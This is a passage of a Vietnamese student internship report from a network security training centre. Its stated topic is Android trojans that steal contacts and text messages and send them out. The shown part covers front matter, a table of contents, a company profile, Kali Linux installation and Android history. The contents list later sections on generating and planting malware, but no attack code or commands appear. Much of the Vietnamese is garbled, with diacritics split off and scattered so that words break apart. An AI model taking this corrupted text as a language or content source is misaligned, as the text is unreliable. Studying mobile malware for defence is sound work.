Báo cáo cuối kỳ ATHENA 31/07/2014

ĐẠI HỌC QUỐC GIA THÀNH PHỐ HỒ CHÍ MINHTRƯỜNG ĐẠI HỌC BÁCH KHOA

KHOA KHOA HỌC & KỸ THUẬT MÁY TÍNH

TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH

MẠNG QUỐC TẾ ATHENA

BÁO CÁO Đ TÀI TH C T P CNTTỀ Ự Ậ

Nghiên c u các Trojan, Malware cho phép đánhứ c p d li u nh danh sách contact, tin nh n trênắ ữ ệ ư ắ

điên tho i s d ng Android và g i ra ngoàiạ ử ụ ử

GVHD: Th y VÕ Đ TH NGầ Ỗ Ắ

SVTH: Lê Công H u ậ

MSSV: 51101058

TPHCM, ngày 28 tháng 07 năm 2014

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

LỜI CAM ĐOAN

Tôi xin cam đoan:

Nh ng n i dung trong báo cáo này là do tôi th c hi n d i sữ ộ ự ệ ướ ự

h ngướ d n tr c ti p c a th y Võ Đ Th ng.ẫ ự ế ủ ầ ỗ ắ

M i tham kh o dùng trong báo cáo này đ u đ c trích d n rõọ ả ề ượ ẫ

ràng tên tác gi , tên công trình, th i gian, đ a đi m công b .ả ờ ị ể ố

M i sao chép không h p l , vi ph m quy ch đào t o, hay gianọ ợ ệ ạ ế ạ

l n, tôi xin ch u hoàn toàn trách nhi m.ậ ị ệ

Sinh viên th c t pự ậ

Lê Công H uậ

SVTH: Lê Công H u 51101058ậ

L I C M NỜ Ả Ơ KHOA KH & KT MÁY TÍNH, ĐH BK

Tôi xin chân thành c m n tr ng Đ i H c Bách Khoa TPHCM và khoa ả ơ ườ ạ ọ

Khoa H c và Kỹ Thu t Máy Tính đã t o đi u ki n cho tôi hoàn thành t t đ t ọ ậ ạ ề ệ ố ợ

TTCN 2 này. Trong đ t th c t p này đã cho tôi nh ng kinh nghi m quý báu. ợ ự ậ ữ ệ

Nh ng kinh nghi m này sẽ giúp tôi hoàn thi n h n trong công vi c và môi ữ ệ ệ ơ ệ

tr ng làm vi c sau này.ườ ệ

M c dù tôi đã c g ng hoàn thành báo cáo th c t p t t nghi p này v i t tặ ố ắ ự ậ ố ệ ớ ấ

c n l c c a b n thân. Nh ng do trình đ hi u bi t và kinh nghi m th c t ả ỗ ự ủ ả ư ộ ể ế ệ ự ế

có h n nên ch c ch n không th tránh kh i nh ng thi u sót nh t đ nh. Tôi r tạ ắ ắ ể ỏ ữ ế ấ ị ấ

mong nh n đ c s đóng góp, chia s đ tôi có th làm t t h n n a.ậ ượ ự ẻ ể ể ố ơ ữ

M t l n n a tôi xin chân thành c m n.ộ ầ ữ ả ơ

Lê Công H uậ

L I C M N TRUNG TÂM ATHENAỜ Ả Ơ

Tôi xin c m n giám đ c Công Ty Qu n Tr và An Ninh M ng Qu c T ả ơ ố ả ị ạ ố ế

Athena, cùng các anh ch trong công ty. Đ c bi t, tôi xin chân thành c m n ị ặ ệ ả ơ

th y Đ Võ Th ng đã nhi t tình giúp đ và h ng d n tôi trong su t th i gian ầ ỗ ắ ệ ỡ ướ ẫ ố ờ

th c t p t i công ty. Th y đã t o m i đi u ki n thu n l i, cung c p nhũng ự ậ ạ ầ ạ ọ ề ệ ậ ợ ấ

ki n th c c n thi t cũng nh đóng góp nh ng ý ki n quý báu đ hoàn thành ế ứ ầ ế ư ữ ế ể

t t bài báo cáo này.ố

M c dù tôi đã c g ng hoàn thành báo cáo th c t p t t nghi p này v i t tặ ố ắ ự ậ ố ệ ớ ấ

c n l c c a b n thân. Nh ng do trình đ hi u bi t và kinh nghi m th c t ả ỗ ự ủ ả ư ộ ể ế ệ ự ế

có h n nên ch c ch n không th tránh kh i nh ng thi u sót nh t đ nh. Tôi r tạ ắ ắ ể ỏ ữ ế ấ ị ấ

mong nh n đ c s đóng góp, chia s đ tôi có th làm t t h n n a.ậ ượ ự ẻ ể ể ố ơ ữ

M t l n n a tôi xin chân thành c m n.ộ ầ ữ ả ơ

Lê Công H uậ

L I M Đ UỜ Ở Ầ

Trong nh ng năm g n đây, v n đ “An toàn và b o m t thông tin” đangữ ầ ấ ề ả ậ

ngày càng nóng. V i s phát tri n đ n chóng m t c a các n n t ng di đ ngớ ự ể ế ặ ủ ề ả ộ

nh iOS, Android, Windows Phone cùng v i nhi u dòng đi n tho i thôngư ớ ề ệ ạ

minh, v n đ b o m t thông tin chuy n d n xu h ng t PC sang mobile. N uấ ề ả ậ ể ầ ướ ừ ế

b n đang s h u m t chi c smartphone c a Apple, Google Nexus, Samsung,ạ ở ữ ộ ế ủ

Nokia, HTC, ... li u b n có dám ch c là “d c ng” c a mình không b nhi m cácệ ạ ắ ế ư ủ ị ễ

ph n m m gián đi p, nghe lén không? Vì sao l i nh v y? Vì theo báo cáo g nầ ề ệ ạ ư ậ ầ

đây c a các hãng ph n m m b o m t nh Kaspersky Lab, Norton AV, Avastủ ầ ề ả ậ ư

hay BKAV s l ng smartphone b nhi m mã đ c ngày càng tăng. Đ c bi tố ượ ị ễ ộ ặ ệ

HĐH Android là m t HĐH phát tri n khá nhanh trong nh ng năm g n đây l iộ ể ữ ầ ạ

là m t m nh đ t béo b cho các Hacker t n công. V i s nh d c tin, thi uộ ả ấ ở ấ ớ ự ẹ ạ ả ế

hi u bi t c a ng i dùng, lòng tham các các th “Free” nh free app, free wifiể ế ủ ườ ứ ư

đã vô tình ti p tay cho các Hacker xâm nh p và cài đ t mã đ c trên chínhế ậ ặ ộ

chi c đi n tho i c a b n. ế ệ ạ ủ ạ

Hôm nay mình vi t bài báo cáo v đ tài “Nghiên c u các trojan, malwareế ề ề ứ

cho phép đánh c p d li u nh danh sách contact, tin nh n trên đi n tho iắ ữ ệ ư ắ ệ ạ

Android và g i ra ngoài” đ cùng nghiên c u, tìm hi u cách th c ho t đ ng,ử ể ứ ể ứ ạ ộ

chia s thông tin cũng nh cung c p các gi i pháp đ phòng tránh. ẻ ư ấ ả ể

NH N XÉT C A KHOAẬ Ủ

....................................................................................................................................

TPHCM, ngày ... tháng ... năm 2014

Tr ng Khoaưở

NH N XÉT C A CÔNG TY TH C T PẬ Ủ Ự Ậ

....................................................................................................................................

Giám đ cố

NH N XÉT C A GIÁO VIÊN H NG D NẬ Ủ ƯỚ Ẫ

....................................................................................................................................

Giáo viên h ng d nướ ẫ

M C L CỤ Ụ

LỜI CAM ĐOAN..................................................................................................................................1

L I C M N KHOA KH & KT MÁY TÍNH, ĐH BK TPHCMỜ Ả Ơ .............................................2

L I C M N TRUNG TÂM ATHENAỜ Ả Ơ .......................................................................................3

L I M Đ UỜ Ở Ầ ......................................................................................................................................4

NH N XÉT C A KHOAẬ Ủ ..................................................................................................................5

NH N XÉT C A CÔNG TY TH C T PẬ Ủ Ự Ậ ...................................................................................6

NH N XÉT C A GIÁO VIÊN H NG D NẬ Ủ ƯỚ Ẫ ..........................................................................7

M C L CỤ Ụ .............................................................................................................................................8

1 GI I THI U CHUNG V CÔNG TY TH C T PỚ Ệ Ề Ự Ậ ............................................9

2 N I DUNG TH C T PỘ Ự Ậ ...........................................................................................11

2.1 Làm trên localhost:..........................................................................................................11

2.1.1 Gi i thi u HĐH Kali Linux:ớ ệ ...............................................................................11

2.1.2 Cài đ t Kali Linux trên VMware:ặ ....................................................................13

2.1.3 Gi i thi u HĐH Android:ớ ệ ...................................................................................29

2.1.4 Gi i thi u v Trojan:ớ ệ ề ..........................................................................................32

2.1.5 Gi i thi u v Malware:ớ ệ ề ......................................................................................34

2.1.6 Sinh mã đ c trên Kali Linux:ộ ...........................................................................36

2.1.7 Đ a mã đ c vào thi t b Android:ư ộ ế ị ................................................................41

2.1.8 Xâm nh p SD card c a thi t b Android t Kali Linux:ậ ủ ế ị ừ .......................45

2.1.9 K t lu n:ế ậ ...................................................................................................................47

2.2 Làm trên VPS......................................................................................................................47

2.2.1 Gi i thi u v VPS:ớ ệ ề ................................................................................................47

2.2.2 Cài đ t mã đ c trên VPS:ặ ộ ...................................................................................49

2.2.3 T VPS xâm nh p vào thi t b Android:ừ ậ ế ị ....................................................56

3 K T QU Đ T Đ CẾ Ả Ạ ƯỢ ...........................................................................................60

4 K T LU N QUÁ TRÌNH TH C T PẾ Ậ Ự Ậ ...............................................................61

1 GI I THI U CHUNG V CÔNG TY TH C T PỚ Ệ Ề Ự Ậ

Cơ s 1_T i TP H Chí Minh:ở ạ ồ

- Trung Tâm Đào T o Qu n Tr M ng và An Ninh M ng Qu c T ạ ả ị ạ ạ ố ế

ATHENA. S 2 Bis Đinh Tiên Hoàng, Ph ng Đa Kao, Tp H Chí ố ườ ồ

Minh, Vi t Nam.ệ

Đi n tho i: ( 84-8 ) 3824 4041ệ ạ

Hotline: 0943 23 00 99

C s 2_T i TP H Chí Minh:ơ ở ạ ồ

- Trung Tâm Đào T o Qu n Tr M ng và An Ninh M ng Qu c T ạ ả ị ạ ạ ố ế

ATHENA 92 Nguy n Đình Chi u ,Ph ng Đa Kao,Qu n 1, Tp H ễ ể ườ ậ ồ

Chí Minh, Vi t Nam.ệ

Website: www.athena.edu.vn or www.athena.com.vn

Đi n tho i: (84-8) 2210 3801ệ ạ

Hotline: 0943 20 00 88

- Trung Tâm Đào T o Qu n Tr M ng & An Ninh M ng Qu c T ATHENAạ ả ị ạ ạ ố ế

đ c thành l p t năm 2004, là m t t ch c quy t nhi u trí th c trượ ậ ừ ộ ổ ứ ụ ề ứ ẻ

Vi t Nam đ y năng đ ng,ệ ầ ộ nhi tệ huy tế và kinh nghi mệ trong lãnh v cự

CNTT, v iớ tâm huy tế góp ph n vào công cu c thúc đ y ti n trình đ aầ ộ ẩ ế ư

công ngh thông tin là ngành kinh t mũi nh n, góp ph n phát tri nệ ế ọ ầ ể

n c nhà.ướ

- Lĩnh v c ho t đ ng:ự ạ ộ

Trung tâm ATHENA đã và đang t p trung ch y u vào đào t o chuyênậ ủ ế ạ

sâu qu nả trị m ng,ạ an ninh m ng,ạ th ngươ m iạ đi nệ tử theo các tiêu

chu nẩ qu cố tế c a các hãng n i ti ng nh Microsoft, Cisco, Oracle,ủ ổ ế ư

Linux LPI, CEH... Song song đó, trung tâm ATHENA còn có nh ngữ

ch ng trình đào t o cao c p dành riêng ươ ạ ấ theo đ n đ t hàng c a cácơ ặ ủ

đ n v nh B Qu c Phòng, B Công An, ngân hàng, doanh nghi p, cácơ ị ư ộ ố ộ ệ

c quan chính ph , t ch c tài chính…ơ ủ ổ ứ

Sau g n 10 năm ho t đ ng,nhi u h c viên t t nghi p trung tâmầ ạ ộ ề ọ ố ệ

ATHENA đã là chuyên gia đ mả nh nậ công tác qu nả lý hệ th ngố

m ng,ạ an ninh m ngạ cho nhi u b ngành nh C c Công Ngh Thôngề ộ ư ụ ệ

Tin - B Qu c Phòng , B Công An, S Thông Tin Truy n Thông cácộ ố ộ ở ề

t nh, b u đi n các t nh,…ỉ ư ệ ỉ

Ngoài ch ng trình đào t o, Trung tâm ATHENA còn có nhi u ch ngươ ạ ề ươ

trình h p tác và trao đ i công ngh v i nhi u đ i h c l n nh đ i h cợ ổ ệ ớ ề ạ ọ ớ ư ạ ọ

Bách Khoa Thành Ph H Chí Minh, H c Vi n An Ninh Nhân Dân( Thố ồ ọ ệ ủ

Đ c), H c Vi n B u Chính Vi n Thông, Hi p h i an toàn thông tinứ ọ ệ ư ễ ệ ộ

(VNISA), Vi n Kỹ Thu t Quân S …ệ ậ ự

- Đ i ngũ gi ng viên:ộ ả

T tấ c các gi ng viên trung tâm ATHENA có đ u t t nghi p t cácả ả ề ố ệ ừ

tr ng đ i h c hàng đ u trong n c.... T t c ườ ạ ọ ầ ướ ấ ả gi ng viên ATHENA đ uả ề

ph i có các ch ng ch qu c t nh MCSA, MCSE, CCNA, CCNP,ả ứ ỉ ố ế ư

Security+, CEH,có b ng s ph m Qu c t (Microsoft Certified Trainer).ằ ư ạ ố ế

Đây là các ch ng ch chuyên môn b t bu c đ đ đi u ki n tham giaứ ỉ ắ ộ ể ủ ề ệ

gi ng d y t i trung tâm ATHENA.ả ạ ạ

Bên c nh đó, các gi ng viên ATHENA th ng đi tu nghi p và c p nh tạ ả ườ ệ ậ ậ

ki n th c công ngh m i t các n c tiên ti n nh Mỹ , Pháp, Hà Lan,ế ứ ệ ớ ừ ướ ế ư

Singapore,... và truy n đ t các công ngh m i này trong các ch ngề ạ ệ ớ ươ

trình đào t o t i trung tâm ATHENA.ạ ạ

2 N I DUNG TH C T PỘ Ự Ậ

2.1 Làm trên localhost:

2.1.1 Gi i thi u HĐH Kali Linux:ớ ệ

Kali Linux là m t h đi u hành đ c xây d ng trên nhân Linux, đ cộ ệ ề ượ ự ượ

thi t k đ ki m tra b o m t, th nghi m xâm nh p các h th ng máy tính.ế ế ể ể ả ậ ử ệ ậ ệ ố

Ti n thân c a Kali Linux là BackTrack, xu t hi n năm 2006 và đ c cácề ủ ấ ệ ượ

chuyên gia đánh giá b o m t a chu ng s d ng. Sau 7 năm liên t c phátả ậ ư ộ ử ụ ụ

tri n, tháng 3 năm 2013, hãng Offensive Security đã công b phiên b n m iể ố ả ớ

c a BackTrack có tên là Kali Linux (đ c xem nh phiên b n BackTrack 6).ủ ượ ư ả

Kali Linux t p h p và phân lo i g n nh t t c các công c thi t y u mà b t kìậ ợ ạ ầ ư ấ ả ụ ế ế ấ

chuyên gia đánh giá b o m t nào cũng c n s d ng khi tác nghi p.ả ậ ầ ử ụ ệ

Nói v u đi m c a Kali là nói v nh ng thay đ i gi a BackTrack và Kali.ề ư ể ủ ề ữ ổ ữ

So v i BackTrack, Kali có r t nhi u c i ti n:ớ ấ ề ả ế

Kali phát tri n trên n n t ng h đi u hành Debianể ề ả ệ ề

Đi u này có nghĩa Kali có r t nhi u u đi m. Đ u tiên là các Repositoryề ấ ề ư ể ầ

(Kho l u tr ph n m m) đ c đ ng b hóa v i các Repository c a Debianư ữ ầ ề ượ ồ ộ ớ ủ

nên có th d dàng có đ c các b n c p nh t vá l i b o m t m i nh t và cácể ễ ượ ả ậ ậ ỗ ả ậ ớ ấ

c p nh t Repository. Duy trì c p nh t (up-to-date) đ i v i các công cậ ậ ậ ậ ố ớ ụ

Penetration Test là m t yêu c u vô cùng quan tr ng.ộ ầ ọ

M t l i th khác là m i công c trong Kali đ u tuân theo chính sách qu nộ ợ ế ọ ụ ề ả

lý gói c a Debian. Đi u này có v không quan tr ng nh ng nó đ m b o rõủ ề ẻ ọ ư ả ả

ràng v m t c u trúc h th ng t ng th , nó cũng giúp cho chúng ta có th dề ặ ấ ệ ố ổ ể ể ễ

dàng h n trong vi c xem xét ho c thay đ i mã ngu n c a các công c .ơ ệ ặ ổ ồ ủ ụ

Tính t ng thích ki n trúcươ ế

M t u đi m quan tr ng trong Kali là nó đã c i ti n kh năng t ng thíchộ ư ể ọ ả ế ả ươ

v i ki n trúc ARM. T khi Kali xu t hi n, nhi u phiên b n n t ng đã đ cớ ế ừ ấ ệ ề ả ấ ượ ượ

t o ra. Gi đây ta có th build Kali trên m t Raspberry Pi ho c trên Samsungạ ờ ể ộ ặ

Galaxy Note.

H tr m ng không dây t t h nỗ ợ ạ ố ơ

M t trong nh ng v n đ đ c các nhà phát tri n Kali chú tr ng nhi uộ ữ ấ ề ượ ể ọ ề

nh t, chính là s h tr cho m t s l ng l n ph n c ng bên trong các thi tấ ự ỗ ợ ộ ố ượ ớ ầ ứ ế

b m ng không dây hay USB Dongles. M t yêu c u quan tr ng khi các chuyênị ạ ộ ầ ọ

gia b o m t th c hi n đánh giá m ng không dây.ả ậ ự ệ ạ

Kh năng tùy bi n caoả ế

Kali r t linh ho t khi đ c p đ n giao di n ho c kh năng tuỳ bi n hấ ạ ề ậ ế ệ ặ ả ế ệ

th ng. Đ i v i giao di n, gi đây ng i dùng đã có th ch n cho mình nhi uố ố ớ ệ ờ ườ ể ọ ề

lo i Desktops nh GNOME, KDE ho c XFCE tùy theo s thích và thói quen sạ ư ặ ở ử

d ng.ụ

D dàng nâng c p gi a các phiên b n Kali trong t ng laiễ ấ ữ ả ươ

Đ i v i b t c ai s d ng Kali, đây là m t tính năng quan tr ng khi b oố ớ ấ ứ ử ụ ộ ọ ả

trì h đi u hành Kali. V i BackTrack, b t kỳ lúc nào khi phiên b n m i đ cệ ề ớ ấ ả ớ ượ

công b thì chúng ta đ u ph i cài l i m i hoàn toàn (Ngo i tr phiên b n R2ố ề ả ạ ớ ạ ừ ả

lên R3 năm ngoái).

Gi đây v i Kali, nh vào s chuy n đ i sang n n t ng h đi u hành ờ ớ ờ ự ể ổ ề ả ệ ềDebian, Kali đã d dàng h n trong vi c âng c p h th ng khi phiên b n m i ễ ơ ệ ấ ệ ố ả ớxu t hi n, ng i dùng không ph i cài l i m i hoàn toàn n aấ ệ ườ ả ạ ớ ữ

2.1.2 Cài đ t Kali Linux trên VMware:ặ

Tr c tiên c n t i v file ISO phiên b n m i nh t c a Kali Linuxướ ầ ả ề ả ớ ấ ủ

trên link d i, bài này ta sẽ ti n hành cài phiên b n ướ ế ả Kali Linux 1.0.8 64

bit. http://www.kali.org/downloads/

Hình 2.1.1 Download HĐH Kali Linux

N u h c Công ngh thông tin thì ch c ch n b n sẽ bi t đ n ph nế ọ ệ ắ ắ ạ ế ế ầ

m m có tên là VMware. VMware Workstation là m t ph n m m t oề ộ ầ ề ạ

máy o hàng đ u. B n có th dùng VMware đ t o 1 máy tính o ch yả ầ ạ ể ể ạ ả ạ

Windows, Linux, Mac OS hay th m chí là Android n a. VMwareậ ữ

Workstation 10 là m t ph n m m gi l p h đi u hành đ bàn r t n iộ ầ ề ả ậ ệ ề ể ấ ổ

ti ng c a hãng VMware Inc. V i h n 50 tính năng m i, có th thay đ iế ủ ớ ơ ớ ể ổ

đáng k cách th c làm vi c v i các máy o.ể ứ ệ ớ ả

T giao di n chính c a VMware thì nh n vào File -> New Vitualừ ệ ủ ấ

Machine (ho c dùng phím t t Ctrl + N).ặ ắ

Ch n Typical và nh n Next. Đây là nh ng cài đ t mà VMwareọ ấ ữ ặ

khuyên dùng n u mu n t thi t l p nh ng tùy ch n thì nh n vàoế ố ự ế ậ ữ ọ ấ

Custom. N u không rành thì t t nh t c ch n Typical đ phi n sau này.ế ố ấ ứ ọ ỡ ề

đây mình ch n Custom và nh n next.Ở ọ ấ

Hình 2.1.2 New Virtual Machine Wizard (Step 1)

Tick vào Installer Disc image file. Và ch n đ n file ISO c n cài đ tọ ế ầ ặ VMware sẽ t nh n di n đó là file iso c a h đi u hành nào.ự ậ ệ ủ ệ ề

Sau đó sẽ ch n tên máy o và n i l u tr d li u c a nóọ ả ơ ư ữ ữ ệ ủ

nh ng b c sau thì c nh n Next. Đ n đây thì có m t tùy ch n làỞ ữ ướ ứ ấ ế ộ ọ “Customize Hardware...” Cái này đ thay đ i các thông s nh dungể ổ ố ư l ng RAM, c ng, USB Controler… Cũng tùy vào h đi u hành đangượ Ổ ứ ệ ề cài mà ch n dung l ng cho phù h p. VMware cũng đã ch n cho mình 1ọ ượ ợ ọ dung l ng phù h p r i.ượ ợ ồ

Sau khi hoàn thành các b c này thì máy o sẽ t đ ng b t và sẽướ ả ự ộ ậ ti n hành cài đ t m t cách t đ ng. Tùy vào dung l ng mà quá trình sẽế ặ ộ ự ộ ượ di n ra nhanh hay ch m thông th ng thì m t vài ch c phút cho đ nễ ậ ườ ấ ụ ế vài ti ng. Tuy nhiên v i nh ng file ISO không h tr nh n di n t đ ngế ớ ữ ỗ ợ ậ ệ ự ộ thì b n v n sẽ ph i cài b ng tay t ng b c nh cài win bình th ngạ ẫ ả ằ ừ ướ ư ườ (đi u này cũng không khó khăn l m đúng không?)ề ắ

B n sẽ nhìn th y màn hình kh i đ ng c a Kali. Ch n m t trong haiạ ấ ở ộ ủ ọ ộ ch đ cài đ t làế ộ ặ Graphical ho cặ Text-Mode. Trong bài vi t này tôi sẽế ch n Graphical Installọ

Hình 2.1.6 Graphical Install

Ch n ngôn ng , v trí đ t n c c a b n sau đó click Continueọ ữ ị ấ ướ ủ ạ

Hình 2.1.7 Select a language

Hình 2.1.8 Select your location

B n cũng sẽ đ c yêu c u đ c u hình bàn phím v i bàn phím b nạ ượ ầ ể ấ ớ ạ đang s d ngử ụ

Hình 2.1.9 Configure the keyboard

B n sẽ c n ph i c u hìnhạ ầ ả ấ Network và Password cho tài kho nả Root

Hình 2.1.10 Configure the network

Hình 2.1.11 Set up user and password

Ti p đ n b n sẽ l a ch n đĩa b n sẽ cài đ t Kali.ế ế ạ ự ọ ổ ạ ặ

Hình 2.1.12 Partition disks (Step 1)

Sau khi c u hình Partition xong, nh n Continue đ quá trình cài đ tấ ấ ể ặ b t đ u.ắ ầ

Hình 2.1.18 Install the system

C u hình Mirror. Kali s d ng m t kho l u tr trung tâm đ phânấ ử ụ ộ ư ữ ể ph i các ng d ng. B n sẽ c n ph i nh p thông tin proxy thích h p khiố ứ ụ ạ ầ ả ậ ợ c n thi t.ầ ế Chú ý: N u b n ch n “No” trong màn hình này, b n sẽ khôngế ạ ọ ạ th cài đ t các gói t kho l u tr c a Kali.ể ặ ừ ư ữ ủ

Hình 2.1.19 Configure the package manager

Ti p đ n là cài đ tế ế ặ GRUB

Hình 2.1.20 Install the GRUB boot loader on the hard disk

Cu i cùng, nh p vàoố ấ Continue đ kh i đ ng l i Kali.ể ở ộ ạ

Hình 2.1.21 Finish the installation

Màn hình đăng nh p và sau khi b n đăng nh p vào Kali.ậ ạ ậ

Hình 2.1.22 Kali Linux login

Giao di n sau khi cài đ t xong:ệ ặ

Hình 2.1.23 Kali Linux OS

2.1.3 Gi i thi u HĐH Android:ớ ệ

L ch sị ử

T ng công ty Android (Android, Inc.) đ c thành l p t i Palo Alto, Californiaổ ượ ậ ạ vào tháng 10 năm 2003 b i Andy Rubin (đ ng sáng l p công ty Danger), Richở ồ ậ Miner (đ ng sáng l p T ng công ty Vi n thông Wildfire), Nick Sears (t ng là Phóồ ậ ổ ễ ừ giám đ c T-Mobile), và Chris White (tr ng thi t k và giao di n t i WebTV) đố ưở ế ế ệ ạ ể phát tri n, theo l i c a Rubin, "các thi t b di đ ng thông minh h n có th bi tể ờ ủ ế ị ộ ơ ể ế đ c v trí và s thích c a ng i dùng". Dù nh ng ng i thành l p và nhân viênượ ị ở ủ ườ ữ ườ ậ đ u là nh ng ng i có ti ng tăm, T ng công ty Android ho t đ ng m t cách âmề ữ ườ ế ổ ạ ộ ộ th m, ch ti t l r ng h đang làm ph n m m dành cho đi n tho i di đ ng. Trongầ ỉ ế ộ ằ ọ ầ ề ệ ạ ộ năm đó, Rubin h t kinh phí. Steve Perlman, m t ng i b n thân c a Rubin, mangế ộ ườ ạ ủ cho ông 10.000 USD ti n m t nh ng t ch i tham gia vào công ty.ề ặ ư ừ ố

Google mua l i T ng công ty Android vào ngày 17 tháng 8 năm 2005, bi nạ ổ ế nó thành m t b ph n tr c thu c Google. Nh ng nhân viên c a ch ch t c aộ ộ ậ ự ộ ữ ủ ủ ố ủ T ng công ty Android, g m Rubin, Miner và White, v n ti p t c l i công ty làmổ ồ ẫ ế ụ ở ạ vi c sau th ng v này. Vào th i đi m đó không có nhi u thông tin v T ng côngệ ươ ụ ờ ể ề ề ổ ty, nh ng nhi u ng i đ n đoán r ng Google d tính tham gia th tr ng đi nư ề ườ ồ ằ ự ị ườ ệ tho i di đ ng sau b c đi này. T i Google, nhóm do Rubin đ ng đ u đã phát tri nạ ộ ướ ạ ứ ầ ể m t n n t ng thi t b di đ ng phát tri n trên n n nhân Linux. Google qu ng báộ ề ả ế ị ộ ể ề ả n n t ng này cho các nhà s n xu t đi n tho i và các nhà m ng v i l i h a sẽ cungề ả ả ấ ệ ạ ạ ớ ờ ứ c p m t h th ng uy n chuy n và có kh năng nâng c p. Google đã liên h v iấ ộ ệ ố ể ể ả ấ ệ ớ hàng lo t hãng ph n c ng cũng nh đ i tác ph n m m, b n tin cho các nhà m ngạ ầ ứ ư ố ầ ề ắ ạ r ng h s n sàng h p tác v i các c p đ khác nhau.ằ ọ ẵ ợ ớ ấ ộ

Ngày càng nhi u suy đoán r ng Google sẽ tham gia th tr ng đi n tho i diề ằ ị ườ ệ ạ đ ng xu t hi n trong tháng 12 năm 2006. Tin t c c a BBC và Nh t báo ph Wallộ ấ ệ ứ ủ ậ ố chú thích r ng Google mu n đ a công ngh tìm ki m và các ng d ng c a h vàoằ ố ư ệ ế ứ ụ ủ ọ đi n tho i di đ ng và h đang n l c làm vi c đ th c hi n đi u này. Các ph ngệ ạ ộ ọ ỗ ự ệ ể ự ệ ề ươ ti n truy n thông truy n th ng l n online cũng vi t v tin đ n r ng Google đangệ ề ề ố ẫ ế ề ồ ằ phát tri n m t thi t b c m tay mang th ng hi u Google. M t vài t báo còn nóiể ộ ế ị ầ ươ ệ ộ ờ r ng trong khi Google v n đang th c hi n nh ng b n mô t kỹ thu t chi ti t, hằ ẫ ự ệ ữ ả ả ậ ế ọ đã trình di n s n ph m m u cho các nhà s n xu t đi n tho i di đ ng và nhàễ ả ẩ ẫ ả ấ ệ ạ ộ m ng. Tháng 9 năm 2007, InformationWeek đăng t i m t nghiên c u c aạ ả ộ ứ ủ Evalueserve cho bi t Google đã n p m t s đ n xin c p b ng sáng ch trong lĩnhế ộ ộ ố ơ ấ ằ ế v c đi n tho i di đ ng. ự ệ ạ ộ

Ngày 5/11/2007, Liên minh thi t b c m tay m (Open Handset Alliance),ế ị ầ ở m t hi p h i bao g m nhi u công ty trong đó có Texas Instruments,T p đoànộ ệ ộ ồ ề ậ Broadcom, Google, HTC, Intel, LG, T p đoàn MarvellTechnology, Motorola, Nvidia,ậ Qualcomm, Samsung Electronics, Sprint Nextel và T-Mobile đ c thành l p v iượ ậ ớ m c đích phát tri n các tiêu chu n m cho thi t b di đ ng. Cùng ngày, Androidụ ể ẩ ở ế ị ộ cũng đ c ra m t v i vai trò là s n ph m đ u tiên c a Liên minh, m t n n t ngượ ắ ớ ả ẩ ầ ủ ộ ề ả thi t b di đ ng đ c xây d ng trên nhân Linux phiên b n 2.6. Chi c đi n tho iế ị ộ ượ ự ả ế ệ ạ ch y Android đ u tiên đ c bán ra là HTC Dream, phát hành ngày 22 tháng 10ạ ầ ượ năm 2008. Bi u t ng c a h đi u hành Android m i là m t con rôb t màu xanhể ượ ủ ệ ề ớ ộ ố

lá cây do hãng thi t k Irina Blok t i California vẽ. ế ế ạ

T năm 2008, Android đã tr i qua nhi u l n c p nh t đ d n d n c i ti nừ ả ề ầ ậ ậ ể ầ ầ ả ế h đi u hành, b sung các tính năng m i và s a các l i trong nh ng l n phát hànhệ ề ổ ớ ử ỗ ữ ầ tr c. M i b n nâng c p đ c đ t tên l n l t theo th t b ng ch cái, theo tênướ ỗ ả ấ ượ ặ ầ ượ ứ ự ả ữ c a m t món ăn tráng mi ng; ví d nh phiên b n 1.5 Cupcake (bánh bông lanủ ộ ệ ụ ư ả nh có kem) ti p n i b ng phiên b n 1.6 Donut (bánh vòng). Phiên b n m i nh tỏ ế ố ằ ả ả ớ ấ (chính th c) là 4.4 KitKat (bánh chocolate). Vào năm 2010, Google ra m t lo tứ ắ ạ thi t b Nexus - m t dòng s n ph m bao g m đi n tho i thông minh và máy tínhế ị ộ ả ẩ ồ ệ ạ b ng ch y h đi u hành Android, do các đ i tác ph n c ng s n xu t. HTC đã h pả ạ ệ ề ố ầ ứ ả ấ ợ tác v i Google trong chi c đi n tho i thông minh Nexus đ u tiên, Nexus One. Kớ ế ệ ạ ầ ể t đó nhi u thi t b m i h n đã gia nh p vào dòng s n ph m này, nh đi n tho iừ ề ế ị ớ ơ ậ ả ẩ ư ệ ạ Nexus 4 và máy tính b ng Nexus 10, l n l t do LG và Samsung s n xu t. Googleả ầ ượ ả ấ xem đi n tho i và máy tính b ng Nexus là nh ng thi t b Android ch l c c aệ ạ ả ữ ế ị ủ ự ủ mình, v i nh ng tính năng ph n c ng và ph n m m m i nh t c a Android. ớ ữ ầ ứ ầ ề ớ ấ ủ

Đ c đi mặ ể

1. Tính m . Android đ c xây d ng t d i đi lên cho phép ng i phátở ượ ự ừ ướ ườ tri n t o các ng d ng di đ ng h p d n v i đ y đ các đi m m nh c aể ạ ứ ụ ộ ấ ẫ ớ ầ ủ ể ạ ủ các thi t b c m tay hi n có. Android hoàn toàn m , m t ng d ng có thế ị ầ ệ ở ộ ứ ụ ể g i t i b t k m t ch c năng lõi c a đi n tho i nh t o cu c g i, g i tinọ ớ ấ ể ộ ứ ủ ệ ạ ư ạ ộ ọ ử nh n hay s d ng máy nh, cho phép ng i phát tri n t o phong phúắ ử ụ ả ườ ể ạ h n, liên k t h n các tính năng cho ng i dùng. Android đ c xây d ngơ ế ơ ườ ượ ự trên nhân Linux m . Thêm n a, nó s d ng m t máy o mà đã đ c t iở ữ ử ụ ộ ả ượ ố

u hóa b nh và ph n c ng v i môi tr ng di đ ng. Android mà m tư ộ ớ ầ ứ ớ ườ ộ ộ mã ngu n m , nó có th đ c m r ng đ k t h p t do gi a các côngồ ở ể ượ ở ộ ể ế ợ ự ữ ngh n i tr i. N n t ng này sẽ ti p t c phát tri n b i c ng đ ng phátệ ổ ộ ề ả ế ụ ể ở ộ ồ tri n đ t o ra các ng d ng di đ ng hoàn h o. ể ể ạ ứ ụ ộ ả

